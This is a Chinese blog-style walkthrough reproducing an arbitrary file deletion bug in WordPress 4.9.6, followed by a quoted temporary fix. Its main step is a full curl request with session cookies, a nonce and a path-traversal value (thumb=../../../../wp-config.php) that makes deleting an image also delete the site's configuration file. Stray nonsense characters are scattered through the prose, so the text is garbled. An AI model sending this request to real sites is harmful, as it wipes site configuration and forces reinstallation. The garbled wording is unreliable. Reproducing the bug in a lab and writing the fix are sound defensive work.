0X00 前言
在推特上看到了一篇paper吃沪,點我啊
wp很久沒看到洞了爆哑,這個漏洞七個月之前就上報了
可以直接利用刪除圖片那個功能刪除網(wǎng)站配置文件绘雁,導致網(wǎng)站只能重裝橡疼。
0X01 復現(xiàn)過程
這是我下載的最新版wordpress(4.9.6)
[圖片上傳失敗...(image-c8a6d4-1530100095072)]
登陸后臺:
上傳張圖片:
然后
edit
發(fā)揮一下Curl
的作用。
執(zhí)行:
curl -v 'http://192.168.19.129/wordpress/wp-admin/post.php?post=7' -H 'Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=wing%7C1531306971%7CZycd9e4B1COvm6oKBWF2SlMfqWu2u0xTG85eAD4giBx%7C099559ea1580b258b82765641ac85a51576507c8c3ebb8e131b20c9eec8f65bc; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=wing%7C1531306971%7CZycd9e4B1COvm6oKBWF2SlMfqWu2u0xTG85eAD4giBx%7Cba9defabde03b6acdb4a5c43fc39244efbec15913483ae43ff0b624be552f5a4; wp-settings-time-1=1530097413' -d 'action=editattachment&_wpnonce=28380b3d4a&thumb=../../../../wp-config.php'
這里把里面的cookie
和_wpnonce
還有post的值換成你的咧七。
_wpnonce
在頁面中:
302跳轉(zhuǎn)說明編輯成功衰齐。
現(xiàn)在點擊
Delete Permanently
即可。配置文件成功刪除继阻。
漏洞原理作者博客上有細節(jié)耻涛,本意是刪除縮略圖。但是沒有對路徑做限制瘟檩,導致可以任意文件刪除抹缕。
作者給的修復代碼
add_filter( 'wp_update_attachment_metadata', 'rips_unlink_tempfix' );
function rips_unlink_tempfix( $data ) {
if( isset($data['thumb']) ) {
$data['thumb'] = basename($data['thumb']);
}
return $data;
}
```## 0x02 Sakura
雞肋之處在于需要登陸,但是危害蠻大的墨辛。
see you卓研!